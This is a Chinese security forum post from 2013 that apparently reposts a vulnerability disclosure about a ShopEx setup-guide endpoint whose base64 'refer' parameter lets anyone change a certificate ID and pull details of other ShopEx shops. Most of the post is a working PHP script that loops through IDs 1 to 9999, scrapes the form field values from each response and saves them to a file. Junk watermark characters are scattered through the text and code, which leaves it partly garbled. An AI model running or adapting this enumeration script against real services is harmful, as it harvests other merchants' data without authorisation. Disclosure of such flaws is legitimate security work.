找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2660|回复: 0
打印 上一主题 下一主题

ShopEx某接口缺陷可遍历所有用户网站

[复制链接]
跳转到指定楼层
楼主
发表于 2013-9-21 15:59:47 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
简要描述:
- g7 h/ x) F' A$ v7 v2 uShopEx某接口缺陷,可遍历所有网站6 l8 t5 I6 y% X. J
详细说明:+ k4 a5 j/ k& g$ \1 @5 S
问题出现在shopex 网店使用向导页面
# d' c( f# D$ U9 [
  v! z+ h( n% G% j  @: l! u- u( W3 U! w
+ h0 i2 e$ i- A" [* \
http://guide.ecos.shopex.cn/step ... WlkaWFuLmNvbVwvIn0=
7 ~: X- d5 j# {' w/ b
% @* c2 A3 Q3 F, A, h( E
- j* S& @$ R, t  g4 g! B: W+ y3 r/ Q) {
refer base64解密为 {"certi_id":'1051',"callback_url":"http:\/\/www.joyogame.net\/"}7 F* G) a9 O4 P$ V  ~! T
$ ^8 Y5 c! v% b1 x5 m! K1 B& x- a' s$ z

2 o2 p$ t: ?, i$ W9 V2 |" A
: |4 Z& M$ @7 R: z我们修改certi_id 即可遍历所有使用了ShopEx程序的网站 : F3 w, _7 m+ r- w. ?- K

  w) E. M2 R/ U1 }
6 O6 I# F; V% G' a2 ^# u1 D& J' k0 a
<?php. w/ G' V6 I+ ]: P1 X: R
$ M4 n+ G& a9 n: b( Z3 f( }
                for ($i=1; $i < 10000; $i++) { //遍历9 P* @% ^6 W9 y. [+ ~9 ?
9 Y6 _9 ]2 G. Y; Q' S" Z
                        ShowshopExD($i);' _( Z  S) G' X, e) x2 h& Z

" S& L% u, `' X1 c" ]% o                }3 o! E2 X' R' q3 D+ Y

0 t% _8 G! j% H) @# @                function ShowshopExD($cid) {
  j/ ~! R5 @* b7 w0 V. U
1 W: Q# W+ {! X9 |                $url='http://guide.ecos.shopex.cn/step2.php';: ?, B0 B( t& {5 v
& ]( t0 l" u: m$ r. S7 g- ~) e) B
                $refer = base64_encode('{"certi_id":'.intval($cid).',"callback_url":"http:\/\/www.a.com\/"}');
7 `, X9 |0 b5 {! L$ b- S0 D7 k5 y" s( A9 \$ |  [  S  i5 _( I
        $url = $url.'?refer='.$refer;
$ f! e+ A* u4 D' O2 D- z  M# l
1 K5 d! Z% e, z' }        $ch = curl_init($url);
) a" I% M+ s1 ^5 A) U' P% n% W3 \7 |) P* D- |2 c! L
        curl_setopt($ch, CURLOPT_RETURNTRANSFER, true) ;
: g4 w5 r- x+ {
" y2 q, Z9 ~5 R        curl_setopt($ch, CURLOPT_BINARYTRANSFER, true) ;
! v+ B) Q$ E% }) ~7 x
1 B) c9 \. K& X+ [1 O        $result = curl_exec($ch);
3 O) p5 ~  Z3 T+ i" R
: P3 j' |9 j' a7 Y        $result = mb_convert_encoding($result, "gb2312", "UTF-8");
* E. ~* @+ W* `* Y" D( P, M
  y: X, x7 T: Y: K        if(strpos($result,$refer))
6 _, u  [" }, [! `, ~: z  m2 h* o; P" Z4 a8 [( }9 _, A5 j
        {
0 q1 n# f2 R5 _8 N6 X6 B
4 U; x( R: ], z* U$ Z8 n                $fp = fopen("c:/shopEx.txt",'ab'); //保存文件& L3 ~6 T$ Y' ?9 I6 y

5 v; c9 f  {. g+ c; }* X                        preg_match_all('/<input\stype="text"(.*?)\/>/',$result,$value);* e1 K% n1 Z! F0 p2 ~# H
5 i( q4 v; U4 |
                foreach ($value[1] as $key) {' m2 E0 t; ?) w1 `" d* S

0 R- f  @* S, [0 E  f                        preg_match_all('/name="(.*?)"(.*?)value="(.*?)"/',trim($key),$res);
% R1 x6 m1 ~; P" X3 j
( G, X( O! q0 u6 z- R8 _+ F0 d- _                        echo $res[1][0].':'.$res[3][0]."\r\n";
' L4 p1 w3 k$ Y  Q# D& _: D; I! l) @7 D- ?
                        $col =$res[1][0].':'.$res[3][0]."\r\n"; # T9 M2 P- E. U; u1 x9 K

* C$ i0 M0 o- u4 C! ]. t6 F, d2 C9 {$ T                        fwrite($fp, $col, strlen($col)); - O4 h% \% e1 ]$ T) a( ^
3 m6 k# E. K+ I) t
                }9 D7 u- u3 o) ~& K* q
9 ~; Q$ U6 a, g
                echo '--------------------------------'."\r\n";& u! d$ h! @7 C1 @/ v7 h% z4 k

2 ?) l0 w, @7 y& z! I                fclose($fp);
& [" y. q# J( [' @; T' I
) F5 ~8 i/ S/ f        }
' S8 t+ o- Y" M4 w4 q& C# Q1 _# u, R) n8 C! k( }& i
        flush();
; j, `! K) z1 Q, s+ y$ v3 P* t$ {7 u% W" f; o
        curl_close($ch);
- B/ Y( u" g* U1 r& B6 s+ v5 f- F5 b0 c* }
                }
8 ?7 B+ x" w. e- q# ?$ z9 i+ q$ _( g4 w/ M8 V
?>) u0 {; P% n: ?3 L+ W9 }
漏洞证明:
+ s9 _; H1 U2 Vhttp://www.myhack58.com/Article/UploadPic/2013-9/201392110502740490.jpg
. P$ ]6 E4 @0 x/ Z8 F6 d& j  j5 b( j% jrefer换成其他加密方式
; ?! y9 T$ V5 s
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表